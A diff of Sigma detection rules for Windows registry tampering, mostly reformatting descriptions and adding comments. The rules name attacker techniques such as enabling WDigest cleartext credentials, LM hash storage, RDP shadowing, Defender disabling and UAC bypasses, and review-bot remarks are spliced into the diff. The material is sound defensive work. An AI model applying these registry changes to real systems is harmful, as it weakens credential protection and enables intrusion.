 id: c420410f-c2d8-4010-856b-dffe21866437
 related:
- - id: 98dedfdd-8333-49d4-9f23-d7018cccae53
- type: similar
+ - id: 98dedfdd-8333-49d4-9f23-d7018cccae53 # process_creation
+ type: similar
 status: experimental
-description: 'Detects changes to the "NoLMHash" registry value in order to allow Windows
- to store LM Hashes.
-
- By setting this registry value to "0" (DWORD), Windows will be allowed to store
- a LAN manager hash of your password in Active Directory and local SAM databases.
-
- '
+description: |
+ Detects changes to the "NoLMHash" registry value in order to allow Windows to store LM Hashes.
+ By setting this registry value to "0" (DWORD), Windows will be allowed to store a LAN manager hash of your password in Active Directory and local SAM databases.
 references:
 - https://www.cisa.gov/news-events/cybersecurity-advisories/aa23-347a
 - https://learn.microsoft.com/en-us/troubleshoot/windows-server/windows-security/prevent-windows-store-lm-hash-password
diff --git a/sigma/sysmon/registry/registry_set/registry_set_taskcache_entry.yml b/sigma/sysmon/registry/registry_set/registry_set_taskcache_entry.yml
index 51ae0e6d0..79250d539 100644
--- a/sigma/sysmon/registry/registry_set/registry_set_taskcache_entry.yml
+++ b/sigma/sysmon/registry/registry_set/registry_set_taskcache_entry.yml
@@ -1,8 +1,7 @@
 title: Scheduled TaskCache Change by Uncommon Program
 id: 4720b7df-40c3-48fd-bbdf-fd4b3c464f0d
 status: experimental
-description: Monitor the creation of a new key under 'TaskCache' when a new scheduled
- task is registered by a process that is not svchost.exe, which is suspicious
+description: Monitor the creation of a new key under 'TaskCache' when a new scheduled task is registered by a process that is not svchost.exe, which is suspicious
 references:
 - https://thedfirreport.com/2021/03/29/sodinokibi-aka-revil-ransomware/
 - https://labs.f-secure.com/blog/scheduled-task-tampering/
@@ -34,12 +33,11 @@ detection:
 filter_svchost:
 Image: C:\WINDOWS\system32\svchost.exe
 filter_ngen:
- Image|startswith: C:\Windows\Microsoft.NET\Framework
+ Image|startswith: C:\Windows\Microsoft.NET\Framework # \Framework\ and \Framework64\
 Image|endswith: \ngen.exe
 TargetObject|contains:
 - \Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{B66B135D-DA06-4FC4-95F8-7458E1D10129}
- - \Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Microsoft\Windows\.NET
- Framework\.NET Framework NGEN
+ - \Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Microsoft\Windows\.NET Framework\.NET Framework NGEN
 filter_office_click_to_run:
 Image:
 - C:\Program Files\Microsoft Office\root\Integration\Integrator.exe
@@ -52,8 +50,7 @@ detection:
 - C:\Program Files\Dropbox\Update\DropboxUpdate.exe
 filter_explorer:
 Image: C:\Windows\explorer.exe
- TargetObject|contains: \Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Microsoft\Windows\PLA\Server
- Manager Performance Monitor\
+ TargetObject|contains: \Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Microsoft\Windows\PLA\Server Manager Performance Monitor\
 filter_system:
 Image: System
 condition: registry_set and (selection and not 1 of filter*)
diff --git a/sigma/sysmon/registry/registry_set/registry_set_telemetry_persistence.yml b/sigma/sysmon/registry/registry_set/registry_set_telemetry_persistence.yml
index 5d2e4715f..d07cf32ca 100644
--- a/sigma/sysmon/registry/registry_set/registry_set_telemetry_persistence.yml
+++ b/sigma/sysmon/registry/registry_set/registry_set_telemetry_persistence.yml
@@ -1,22 +1,14 @@
 title: Potential Registry Persistence Attempt Via Windows Telemetry
 id: 73a883d0-0348-4be4-a8d8-51031c2564f8
 related:
- - id: 4e8d5fd3-c959-441f-a941-f73d0cdcdca5
- type: obsoletes
+ - id: 4e8d5fd3-c959-441f-a941-f73d0cdcdca5
+ type: obsoletes
 status: test
-description: 'Detects potential persistence behavior using the windows telemetry registry
- key.
-
- Windows telemetry makes use of the binary CompatTelRunner.exe to run a variety
- of commands and perform the actual telemetry collections.
-
- This binary was created to be easily extensible, and to that end, it relies on
- the registry to instruct on which commands to run.
-
- The problem is, it will run any arbitrary command without restriction of location
- or type.
-
- '
+description: |
+ Detects potential persistence behavior using the windows telemetry registry key.
+ Windows telemetry makes use of the binary CompatTelRunner.exe to run a variety of commands and perform the actual telemetry collections.
+ This binary was created to be easily extensible, and to that end, it relies on the registry to instruct on which commands to run.
+ The problem is, it will run any arbitrary command without restriction of location or type.
 references:
 - https://www.trustedsec.com/blog/abusing-windows-telemetry-for-persistence/
 author: Lednyov Alexey, oscd.community, Sreeman
@@ -29,8 +21,7 @@ tags:
 logsource:
 category: registry_set
 product: windows
- definition: 'Requirements: Sysmon config that monitors \SOFTWARE\Microsoft\Windows
- NT\CurrentVersion\AppCompatFlags\TelemetryController subkey of the HKLM hives'
+ definition: 'Requirements: Sysmon config that monitors \SOFTWARE\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\TelemetryController subkey of the HKLM hives'
 detection:
 registry_set:
 EventID: 13
diff --git a/sigma/sysmon/registry/registry_set/registry_set_terminal_server_suspicious.yml b/sigma/sysmon/registry/registry_set/registry_set_terminal_server_suspicious.yml
index 46e776be5..7b649d2a5 100644
--- a/sigma/sysmon/registry/registry_set/registry_set_terminal_server_suspicious.yml
+++ b/sigma/sysmon/registry/registry_set/registry_set_terminal_server_suspicious.yml
@@ -1,25 +1,21 @@
 title: RDP Sensitive Settings Changed to Zero
 id: a2863fbc-d5cb-48d5-83fb-d976d4b1743b
 related:
- - id: 3f6b7b62-61aa-45db-96bd-9c31b36b653c
- type: similar
+ - id: 3f6b7b62-61aa-45db-96bd-9c31b36b653c
+ type: similar
 status: test
-description: 'Detects tampering of RDP Terminal Service/Server sensitive settings.
-
- Such as allowing unauthorized users access to a system via the ''fAllowUnsolicited''
- or enabling RDP via ''fDenyTSConnections'', etc.
-
- '
+description: |
+ Detects tampering of RDP Terminal Service/Server sensitive settings.
+ Such as allowing unauthorized users access to a system via the 'fAllowUnsolicited' or enabling RDP via 'fDenyTSConnections', etc.
 references:
- - https://blog.menasec.net/2019/02/threat-hunting-rdp-hijacking-via.html
- - http://woshub.com/rds-shadow-how-to-connect-to-a-user-session-in-windows-server-2012-r2/
- - https://twitter.com/SagieSec/status/1469001618863624194?t=HRf0eA0W1YYzkTSHb-Ky1A&s=03
+ - https://blog.menasec.net/2019/02/threat-hunting-rdp-hijacking-via.html # Related to RDP hijacking via the "ServiceDll" key
+ - http://woshub.com/rds-shadow-how-to-connect-to-a-user-session-in-windows-server-2012-r2/ # Related to the Shadow RPD technique
+ - https://twitter.com/SagieSec/status/1469001618863624194?t=HRf0eA0W1YYzkTSHb-Ky1A&s=03 # Related to the Shadow RPD technique
 - https://threathunterplaybook.com/hunts/windows/190407-RegModEnableRDPConnections/notebook.html
 - https://bazaar.abuse.ch/sample/6f3aa9362d72e806490a8abce245331030d1ab5ac77e400dd475748236a6cc81/
- - http://etutorials.org/Microsoft+Products/microsoft+windows+server+2003+terminal+services/Chapter+6+Registry/Registry+Keys+for+Terminal+Services/
- - https://admx.help/HKLM/SOFTWARE/Policies/Microsoft/Windows%20NT/Terminal%20Services
-author: Samir Bousseaden, David ANDRE, Roberto Rodriguez @Cyb3rWard0g, Nasreddine
- Bencherchali
+ - http://etutorials.org/Microsoft+Products/microsoft+windows+server+2003+terminal+services/Chapter+6+Registry/Registry+Keys+for+Terminal+Services/ # Contain description for most of the keys mentioned here (check it out if you want more information
+ - https://admx.help/HKLM/SOFTWARE/Policies/Microsoft/Windows%20NT/Terminal%20Services # Contain description for most of the keys mentioned here (check it out if you want more information)
+author: Samir Bousseaden, David ANDRE, Roberto Rodriguez @Cyb3rWard0g, Nasreddine Bencherchali
 date: 2022/09/29
 modified: 2022/11/26
 tags:
@@ -36,13 +32,12 @@ detection:
 Channel: Microsoft-Windows-Sysmon/Operational
 selection:
 TargetObject|endswith:
- - \fDenyTSConnections
- - \fSingleSessionPerUser
- - \UserAuthentication
+ - \fDenyTSConnections # Specifies whether Remote Desktop connections are enabled - When set to zero RDP is enabled
+ - \fSingleSessionPerUser # When changed to 0 it allows multiple RDP sessions
+ - \UserAuthentication # Specifies that Network-Level user authentication is not required before the remote desktop connection is established
 Details: DWORD (0x00000000)
 condition: registry_set and selection
 falsepositives:
- - Some of the keys mentioned here could be modified by an administrator while
- setting group policy (it should be investigated either way)
+ - Some of the keys mentioned here could be modified by an administrator while setting group policy (it should be investigated either way)
 level: medium
 ruletype: Sigma
diff --git a/sigma/sysmon/registry/registry_set/registry_set_terminal_server_tampering.yml b/sigma/sysmon/registry/registry_set/registry_set_terminal_server_tampering.yml
index e657080af..9929f2939 100644
--- a/sigma/sysmon/registry/registry_set/registry_set_terminal_server_tampering.yml
+++ b/sigma/sysmon/registry/registry_set/registry_set_terminal_server_tampering.yml
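Review bot: The reference comments added on the woshub and twitter entries in the first hunk read `# Related to the Shadow RPD technique`; "RPD" is a transposition of "RDP", and the etutorials comment on the same list is missing its closing parenthesis, which should read `# Contain description for most of the keys mentioned here (check it out if you want more information)`. The identical three comment lines are added to registry_set_terminal_server_tampering.yml in the next file section, so both copies need the fix. The `\UserAuthentication` comment in the second hunk describes the meaning of the value zero without saying so; since the selection pins `Details: DWORD (0x00000000)`, prefixing it with `When set to 0:` like the two lines above it would keep the three comments parallel.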
@@ -1,29 +1,25 @@
 title: RDP Sensitive Settings Changed
 id: 3f6b7b62-61aa-45db-96bd-9c31b36b653c
 related:
- - id: 171b67e1-74b4-460e-8d55-b331f3e32d67
- type: obsoletes
- - id: 41904ebe-d56c-4904-b9ad-7a77bdf154b3
- type: obsoletes
- - id: a2863fbc-d5cb-48d5-83fb-d976d4b1743b
- type: similar
+ - id: 171b67e1-74b4-460e-8d55-b331f3e32d67
+ type: obsoletes
+ - id: 41904ebe-d56c-4904-b9ad-7a77bdf154b3
+ type: obsoletes
+ - id: a2863fbc-d5cb-48d5-83fb-d976d4b1743b
+ type: similar
 status: test
-description: 'Detects tampering of RDP Terminal Service/Server sensitive settings.
-
- Such as allowing unauthorized users access to a system via the ''fAllowUnsolicited''
- or enabling RDP via ''fDenyTSConnections''...etc
-
- '
+description: |
+ Detects tampering of RDP Terminal Service/Server sensitive settings.
+ Such as allowing unauthorized users access to a system via the 'fAllowUnsolicited' or enabling RDP via 'fDenyTSConnections'...etc
 references:
- - https://blog.menasec.net/2019/02/threat-hunting-rdp-hijacking-via.html
- - http://woshub.com/rds-shadow-how-to-connect-to-a-user-session-in-windows-server-2012-r2/
- - https://twitter.com/SagieSec/status/1469001618863624194?t=HRf0eA0W1YYzkTSHb-Ky1A&s=03
+ - https://blog.menasec.net/2019/02/threat-hunting-rdp-hijacking-via.html # Related to RDP hijacking via the "ServiceDll" key
+ - http://woshub.com/rds-shadow-how-to-connect-to-a-user-session-in-windows-server-2012-r2/ # Related to the Shadow RPD technique
+ - https://twitter.com/SagieSec/status/1469001618863624194?t=HRf0eA0W1YYzkTSHb-Ky1A&s=03 # Related to the Shadow RPD technique
 - https://threathunterplaybook.com/hunts/windows/190407-RegModEnableRDPConnections/notebook.html
 - https://bazaar.abuse.ch/sample/6f3aa9362d72e806490a8abce245331030d1ab5ac77e400dd475748236a6cc81/
- - http://etutorials.org/Microsoft+Products/microsoft+windows+server+2003+terminal+services/Chapter+6+Registry/Registry+Keys+for+Terminal+Services/
- - https://admx.help/HKLM/SOFTWARE/Policies/Microsoft/Windows%20NT/Terminal%20Services
-author: Samir Bousseaden, David ANDRE, Roberto Rodriguez @Cyb3rWard0g, Nasreddine
- Bencherchali
+ - http://etutorials.org/Microsoft+Products/microsoft+windows+server+2003+terminal+services/Chapter+6+Registry/Registry+Keys+for+Terminal+Services/ # Contain description for most of the keys mentioned here (check it out if you want more information
+ - https://admx.help/HKLM/SOFTWARE/Policies/Microsoft/Windows%20NT/Terminal%20Services # Contain description for most of the keys mentioned here (check it out if you want more information)
+author: Samir Bousseaden, David ANDRE, Roberto Rodriguez @Cyb3rWard0g, Nasreddine Bencherchali
 date: 2022/08/06
 modified: 2023/08/17
 tags:
@@ -44,29 +40,28 @@ detection:
 - \Control\Terminal Server\
 TargetObject|endswith: \Shadow
 Details:
- - DWORD (0x00000001)
- - DWORD (0x00000002)
- - DWORD (0x00000003)
- - DWORD (0x00000004)
+ - DWORD (0x00000001) # Full Control with user’s permission
+ - DWORD (0x00000002) # Full Control without user’s permission
+ - DWORD (0x00000003) # View Session with user’s permission
+ - DWORD (0x00000004) # View Session without user’s permission
 selection_terminal_services_key:
 TargetObject|contains:
 - \Control\Terminal Server\
 - SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services\
 selection_terminal_services_values:
 TargetObject|endswith:
- - \fAllowUnsolicited
+ - \fAllowUnsolicited # Allow unsolicited remote assistance offers
 - \fAllowUnsolicitedFullControl
 Details: DWORD (0x00000001)
 selection_tamper_only:
+ # Any changes to these keys should be suspicious and looked at
 TargetObject|contains:
- - \services\TermService\Parameters\ServiceDll
- - \Control\Terminal Server\WinStations\RDP-Tcp\InitialProgram
- - \Control\Terminal Server\InitialProgram
- - SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services\InitialProgram
- condition: registry_set and (selection_shadow or (selection_terminal_services_key
- and selection_terminal_services_values) or selection_tamper_only)
+ - \services\TermService\Parameters\ServiceDll # RDP hijacking
+ - \Control\Terminal Server\WinStations\RDP-Tcp\InitialProgram # This value can be set to specify a program to run automatically when a user logs on to a remote computer.
+ - \Control\Terminal Server\InitialProgram # This value can be set to specify a program to run automatically when a user logs on to a remote computer.
+ - SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services\InitialProgram # This value can be set to specify a program to run automatically when a user logs on to a remote computer.
+ condition: registry_set and (selection_shadow or (selection_terminal_services_key and selection_terminal_services_values) or selection_tamper_only)
 falsepositives:
- - Some of the keys mentioned here could be modified by an administrator while
- setting group policy (it should be investigated either way)
+ - Some of the keys mentioned here could be modified by an administrator while setting group policy (it should be investigated either way)
 level: high
 ruletype: Sigma
diff --git a/sigma/sysmon/registry/registry_set/registry_set_timeproviders_dllname.yml b/sigma/sysmon/registry/registry_set/registry_set_timeproviders_dllname.yml
index b817ce9c4..fb3079d65 100644
--- a/sigma/sysmon/registry/registry_set/registry_set_timeproviders_dllname.yml
+++ b/sigma/sysmon/registry/registry_set/registry_set_timeproviders_dllname.yml
@@ -1,14 +1,10 @@
 title: Set TimeProviders DllName
 id: e88a6ddc-74f7-463b-9b26-f69fc0d2ce85
 status: experimental
-description: 'Detects processes setting a new DLL in DllName in under HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\W32Time\TimeProvider.
-
+description: |
+ Detects processes setting a new DLL in DllName in under HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\W32Time\TimeProvider.
 Adversaries may abuse time providers to execute DLLs when the system boots.
-
- The Windows Time service (W32Time) enables time synchronization across and within
- domains.
-
- '
+ The Windows Time service (W32Time) enables time synchronization across and within domains.
 references:
 - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1547.003/T1547.003.md
 author: frack113
diff --git a/sigma/sysmon/registry/registry_set/registry_set_tls_protocol_old_version_enabled.yml b/sigma/sysmon/registry/registry_set/registry_set_tls_protocol_old_version_enabled.yml
index f616cd91e..5c38284c2 100644
--- a/sigma/sysmon/registry/registry_set/registry_set_tls_protocol_old_version_enabled.yml
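Review bot: The comment `# This value can be set to specify a program to run automatically when a user logs on to a remote computer.` is repeated verbatim on all three InitialProgram entries of selection_tamper_only in the second hunk; stating it once above the list, e.g. `# InitialProgram (three locations): a program started automatically at remote logon`, keeps the list readable. The terse `# RDP hijacking` on the ServiceDll entry would read better aligned with the reference comment added in the first hunk, e.g. `# TermService service DLL; replacing it is the RDP hijacking described in the menasec reference`. The first hunk of this section shares the "RPD" typo and missing parenthesis already raised on registry_set_terminal_server_suspicious.yml.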
+++ b/sigma/sysmon/registry/registry_set/registry_set_tls_protocol_old_version_enabled.yml
@@ -1,8 +1,7 @@
 title: Old TLS1.0/TLS1.1 Protocol Version Enabled
 id: 439957a7-ad86-4a8f-9705-a28131c6821b
 status: experimental
-description: Detects applications or users re-enabling old TLS versions by setting
- the "Enabled" value to "1" for the "Protocols" registry key.
+description: Detects applications or users re-enabling old TLS versions by setting the "Enabled" value to "1" for the "Protocols" registry key.
 references:
 - https://techcommunity.microsoft.com/t5/windows-it-pro-blog/tls-1-0-and-tls-1-1-soon-to-be-disabled-in-windows/ba-p/3887947
 author: Nasreddine Bencherchali (Nextron Systems)
diff --git a/sigma/sysmon/registry/registry_set/registry_set_treatas_persistence.yml b/sigma/sysmon/registry/registry_set/registry_set_treatas_persistence.yml
index 864fe09bb..89ff86a56 100644
--- a/sigma/sysmon/registry/registry_set/registry_set_treatas_persistence.yml
+++ b/sigma/sysmon/registry/registry_set/registry_set_treatas_persistence.yml
@@ -27,8 +27,12 @@ detection:
 filter_office2:
 Image: C:\Program Files (x86)\Microsoft Office\root\integration\integrator.exe
 filter_svchost:
+ # Example of target object by svchost
+ # TargetObject: HKLM\SOFTWARE\Microsoft\MsixRegistryCompatibility\Package\Microsoft.Paint_11.2208.6.0_x64__8wekyb3d8bbwe\User\SOFTWARE\Classes\CLSID\{0003000A-0000-0000-C000-000000000046}\TreatAs\(Default)
+ # TargetObject: HKU\S-1-5-21-1000000000-000000000-000000000-0000_Classes\CLSID\{0003000A-0000-0000-C000-000000000046}\TreatAs\(Default)
 Image: C:\Windows\system32\svchost.exe
 filter_misexec:
+ # This FP has been seen during installation/updates
 Image:
 - C:\Windows\system32\msiexec.exe
 - C:\Windows\SysWOW64\msiexec.exe
diff --git a/sigma/sysmon/registry/registry_set/registry_set_turn_on_dev_features.yml b/sigma/sysmon/registry/registry_set/registry_set_turn_on_dev_features.yml
index 511696186..4f05c5b28 100644
--- a/sigma/sysmon/registry/registry_set/registry_set_turn_on_dev_features.yml
+++ b/sigma/sysmon/registry/registry_set/registry_set_turn_on_dev_features.yml
@@ -1,12 +1,10 @@
 title: Potential Signing Bypass Via Windows Developer Features - Registry
 id: b110ebaf-697f-4da1-afd5-b536fa27a2c1
 related:
- - id: a383dec4-deec-4e6e-913b-ed9249670848
- type: similar
+ - id: a383dec4-deec-4e6e-913b-ed9249670848
+ type: similar
 status: experimental
-description: Detects when the enablement of developer features such as "Developer
- Mode" or "Application Sideloading". Which allows the user to install untrusted
- packages.
+description: Detects when the enablement of developer features such as "Developer Mode" or "Application Sideloading". Which allows the user to install untrusted packages.
 references:
 - https://twitter.com/malmoeb/status/1560536653709598721
 - https://www.sentinelone.com/labs/inside-malicious-windows-apps-for-malware-deployment/
diff --git a/sigma/sysmon/registry/registry_set/registry_set_uac_bypass_sdclt.yml b/sigma/sysmon/registry/registry_set/registry_set_uac_bypass_sdclt.yml
index 1cc14cecf..7721adae4 100644
--- a/sigma/sysmon/registry/registry_set/registry_set_uac_bypass_sdclt.yml
+++ b/sigma/sysmon/registry/registry_set/registry_set_uac_bypass_sdclt.yml
@@ -1,8 +1,7 @@
 title: UAC Bypass via Sdclt
 id: 5b872a46-3b90-45c1-8419-f675db8053aa
 status: experimental
-description: Detects the pattern of UAC Bypass using registry key manipulation of
- sdclt.exe (e.g. UACMe 53)
+description: Detects the pattern of UAC Bypass using registry key manipulation of sdclt.exe (e.g. UACMe 53)
 references:
 - https://enigma0x3.net/2017/03/17/fileless-uac-bypass-using-sdclt-exe/
 - https://github.com/hfiref0x/UACME
diff --git a/sigma/sysmon/registry/registry_set/registry_set_uac_bypass_winsat.yml b/sigma/sysmon/registry/registry_set/registry_set_uac_bypass_winsat.yml
index 8535d1b08..11faecb7a 100644
--- a/sigma/sysmon/registry/registry_set/registry_set_uac_bypass_winsat.yml
+++ b/sigma/sysmon/registry/registry_set/registry_set_uac_bypass_winsat.yml
@@ -1,8 +1,7 @@
 title: UAC Bypass Abusing Winsat Path Parsing - Registry
 id: 6597be7b-ac61-4ac8-bef4-d3ec88174853
 status: test
-description: Detects the pattern of UAC Bypass using a path parsing issue in winsat.exe
- (UACMe 52)
+description: Detects the pattern of UAC Bypass using a path parsing issue in winsat.exe (UACMe 52)
 references:
 - https://github.com/hfiref0x/UACME
 author: Christian Burkard (Nextron Systems)
diff --git a/sigma/sysmon/registry/registry_set/registry_set_uac_bypass_wmp.yml b/sigma/sysmon/registry/registry_set/registry_set_uac_bypass_wmp.yml
index 0313fe7e3..776bb47c6 100644
--- a/sigma/sysmon/registry/registry_set/registry_set_uac_bypass_wmp.yml
+++ b/sigma/sysmon/registry/registry_set/registry_set_uac_bypass_wmp.yml
@@ -1,8 +1,7 @@
 title: UAC Bypass Using Windows Media Player - Registry
 id: 5f9db380-ea57-4d1e-beab-8a2d33397e93
 status: test
-description: Detects the pattern of UAC Bypass using Windows Media Player osksupport.dll
- (UACMe 32)
+description: Detects the pattern of UAC Bypass using Windows Media Player osksupport.dll (UACMe 32)
 references:
 - https://github.com/hfiref0x/UACME
 author: Christian Burkard (Nextron Systems)
@@ -21,8 +20,7 @@ detection:
 EventID: 13
 Channel: Microsoft-Windows-Sysmon/Operational
 selection:
- TargetObject|endswith: \SOFTWARE\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\Compatibility
- Assistant\Store\C:\Program Files\Windows Media Player\osk.exe
+ TargetObject|endswith: \SOFTWARE\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\Compatibility Assistant\Store\C:\Program Files\Windows Media Player\osk.exe
 Details: Binary Data
 condition: registry_set and selection
 falsepositives:
diff --git a/sigma/sysmon/registry/registry_set/registry_set_vbs_payload_stored.yml b/sigma/sysmon/registry/registry_set/registry_set_vbs_payload_stored.yml
index fe075db3e..dad30ba75 100644
--- a/sigma/sysmon/registry/registry_set/registry_set_vbs_payload_stored.yml
+++ b/sigma/sysmon/registry/registry_set/registry_set_vbs_payload_stored.yml
@@ -1,8 +1,7 @@
 title: VBScript Payload Stored in Registry
 id: 46490193-1b22-4c29-bdd6-5bf63907216f
 status: experimental
-description: Detects VBScript content stored into registry keys as seen being used
- by UNC2452 group
+description: Detects VBScript content stored into registry keys as seen being used by UNC2452 group
 references:
 - https://www.microsoft.com/security/blog/2021/03/04/goldmax-goldfinder-sibot-analyzing-nobelium-malware/
 author: Florian Roth (Nextron Systems)
diff --git a/sigma/sysmon/registry/registry_set/registry_set_wab_dllpath_reg_change.yml b/sigma/sysmon/registry/registry_set/registry_set_wab_dllpath_reg_change.yml
index 276efb5c7..8cec1a469 100644
--- a/sigma/sysmon/registry/registry_set/registry_set_wab_dllpath_reg_change.yml
+++ b/sigma/sysmon/registry/registry_set/registry_set_wab_dllpath_reg_change.yml
@@ -1,8 +1,7 @@
 title: Execution DLL of Choice Using WAB.EXE
 id: fc014922-5def-4da9-a0fc-28c973f41bfb
 status: test
-description: This rule detects that the path to the DLL written in the registry is
- different from the default one. Launched WAB.exe tries to load the DLL from Registry.
+description: This rule detects that the path to the DLL written in the registry is different from the default one. Launched WAB.exe tries to load the DLL from Registry.
 references:
 - https://github.com/LOLBAS-Project/LOLBAS/blob/8283d8d91552213ded165fd36deb6cb9534cb443/yml/OSBinaries/Wab.yml
 - https://twitter.com/Hexacorn/status/991447379864932352
diff --git a/sigma/sysmon/registry/registry_set/registry_set_wdigest_enable_uselogoncredential.yml b/sigma/sysmon/registry/registry_set/registry_set_wdigest_enable_uselogoncredential.yml
index b0b964067..08118037e 100644
--- a/sigma/sysmon/registry/registry_set/registry_set_wdigest_enable_uselogoncredential.yml
+++ b/sigma/sysmon/registry/registry_set/registry_set_wdigest_enable_uselogoncredential.yml
@@ -1,9 +1,7 @@
 title: Wdigest Enable UseLogonCredential
 id: d6a9b252-c666-4de6-8806-5561bbbd3bdc
 status: test
-description: Detects potential malicious modification of the property value of UseLogonCredential
- from HKLM:\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest to enable
- clear-text credentials
+description: Detects potential malicious modification of the property value of UseLogonCredential from HKLM:\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest to enable clear-text credentials
 references:
 - https://threathunterplaybook.com/hunts/windows/190510-RegModWDigestDowngrade/notebook.html
 - https://support.microsoft.com/en-us/topic/microsoft-security-advisory-update-to-improve-credentials-protection-and-management-may-13-2014-93434251-04ac-b7f3-52aa-9f951c14b649
diff --git a/sigma/sysmon/registry/registry_set/registry_set_windows_defender_tamper.yml b/sigma/sysmon/registry/registry_set/registry_set_windows_defender_tamper.yml
index c652e8e8e..062c4d895 100644
--- a/sigma/sysmon/registry/registry_set/registry_set_windows_defender_tamper.yml
+++ b/sigma/sysmon/registry/registry_set/registry_set_windows_defender_tamper.yml
@@ -1,13 +1,12 @@
 title: Disable Windows Defender Functionalities Via Registry Keys
 id: 0eb46774-f1ab-4a74-8238-1155855f2263
 related:
- - id: a64e4198-c1c8-46a5-bc9c-324c86455fd4
- type: obsoletes
- - id: fd115e64-97c7-491f-951c-fc8da7e042fa
- type: obsoletes
+ - id: a64e4198-c1c8-46a5-bc9c-324c86455fd4
+ type: obsoletes
+ - id: fd115e64-97c7-491f-951c-fc8da7e042fa
+ type: obsoletes
 status: experimental
-description: Detects when attackers or tools disable Windows Defender functionalities
- via the Windows registry
+description: Detects when attackers or tools disable Windows Defender functionalities via the Windows registry
 references:
 - https://thedfirreport.com/2021/10/18/icedid-to-xinglocker-ransomware-in-24-hours/
 - https://gist.github.com/anadr/7465a9fde63d41341136949f14c21105
@@ -16,8 +15,7 @@ references:
 - https://www.tenforums.com/tutorials/32236-enable-disable-microsoft-defender-pua-protection-windows-10-a.html
 - https://www.tenforums.com/tutorials/105533-enable-disable-windows-defender-exploit-protection-settings.html
 - https://www.tenforums.com/tutorials/123792-turn-off-tamper-protection-microsoft-defender-antivirus.html
-author: "AlertIQ, J\xE1n Tren\u010Dansk\xFD, frack113, Nasreddine Bencherchali, Swachchhanda\
- \ Shrawan Poudel"
+author: AlertIQ, Ján Trenčanský, frack113, Nasreddine Bencherchali, Swachchhanda Shrawan Poudel
 date: 2022/08/01
 modified: 2023/08/17
 tags:
diff --git a/sigma/sysmon/registry/registry_set/registry_set_winget_admin_settings_tampering.yml b/sigma/sysmon/registry/registry_set/registry_set_winget_admin_settings_tampering.yml
index 32630394d..55fe2435c 100644
--- a/sigma/sysmon/registry/registry_set/registry_set_winget_admin_settings_tampering.yml
+++ b/sigma/sysmon/registry/registry_set/registry_set_winget_admin_settings_tampering.yml
@@ -1,8 +1,7 @@
 title: Winget Admin Settings Modification
 id: 6db5eaf9-88f7-4ed9-af7d-9ef2ad12f236
 status: experimental
-description: Detects changes to the AppInstaller (winget) admin settings. Such as
- enabling local manifest installations or disabling installer hash checks
+description: Detects changes to the AppInstaller (winget) admin settings. Such as enabling local manifest installations or disabling installer hash checks
 references:
 - https://github.com/nasbench/Misc-Research/tree/b9596e8109dcdb16ec353f316678927e507a5b8d/LOLBINs/Winget
 - https://github.com/microsoft/winget-cli/blob/02d2f93807c9851d73eaacb4d8811a76b64b7b01/src/AppInstallerCommonCore/Public/winget/AdminSettings.h#L13
@@ -26,7 +25,6 @@ detection:
 TargetObject|endswith: \LocalState\admin_settings
 condition: registry_set and selection
 falsepositives:
- - The event doesn't contain information about the type of change. False positives
- are expected with legitimate changes
+ - The event doesn't contain information about the type of change. False positives are expected with legitimate changes
 level: low
 ruletype: Sigma
diff --git a/sigma/sysmon/registry/registry_set/registry_set_winget_enable_local_manifest.yml b/sigma/sysmon/registry/registry_set/registry_set_winget_enable_local_manifest.yml
index 3c1bcdbff..4d400db53 100644
--- a/sigma/sysmon/registry/registry_set/registry_set_winget_enable_local_manifest.yml
+++ b/sigma/sysmon/registry/registry_set/registry_set_winget_enable_local_manifest.yml
@@ -1,9 +1,7 @@
 title: Enable Local Manifest Installation With Winget
 id: fa277e82-9b78-42dd-b05c-05555c7b6015
 status: experimental
-description: Detects changes to the AppInstaller (winget) policy. Specifically the
- activation of the local manifest installation, which allows a user to install
- new packages via custom manifests.
+description: Detects changes to the AppInstaller (winget) policy. Specifically the activation of the local manifest installation, which allows a user to install new packages via custom manifests.
 references:
 - https://github.com/nasbench/Misc-Research/tree/b9596e8109dcdb16ec353f316678927e507a5b8d/LOLBINs/Winget
 author: Nasreddine Bencherchali (Nextron Systems)
@@ -25,7 +23,6 @@ detection:
 Details: DWORD (0x00000001)
 condition: registry_set and selection
 falsepositives:
- - Administrators or developers might enable this for testing purposes or to install
- custom private packages
+ - Administrators or developers might enable this for testing purposes or to install custom private packages
 level: medium
 ruletype: Sigma
diff --git a/sigma/sysmon/registry/registry_set/registry_set_winlogon_allow_multiple_tssessions.yml b/sigma/sysmon/registry/registry_set/registry_set_winlogon_allow_multiple_tssessions.yml
index a0e22e129..9b5663aca 100644
--- a/sigma/sysmon/registry/registry_set/registry_set_winlogon_allow_multiple_tssessions.yml
+++ b/sigma/sysmon/registry/registry_set/registry_set_winlogon_allow_multiple_tssessions.yml
@@ -1,14 +1,10 @@
 title: Winlogon AllowMultipleTSSessions Enable
 id: f7997770-92c3-4ec9-b112-774c4ef96f96
 status: experimental
-description: 'Detects when the ''AllowMultipleTSSessions'' value is enabled.
-
+description: |
+ Detects when the 'AllowMultipleTSSessions' value is enabled.
 Which allows for multiple Remote Desktop connection sessions to be opened at once.
-
- This is often used by attacker as a way to connect to an RDP session without disconnecting
- the other users
-
- '
+ This is often used by attacker as a way to connect to an RDP session without disconnecting the other users
 references:
 - http://blog.talosintelligence.com/2022/09/lazarus-three-rats.html
 author: Nasreddine Bencherchali (Nextron Systems)
diff --git a/sigma/sysmon/registry/registry_set/registry_set_winlogon_notify_key.yml b/sigma/sysmon/registry/registry_set/registry_set_winlogon_notify_key.yml
index c8dfea2bc..5ef0cdf52 100644
--- a/sigma/sysmon/registry/registry_set/registry_set_winlogon_notify_key.yml
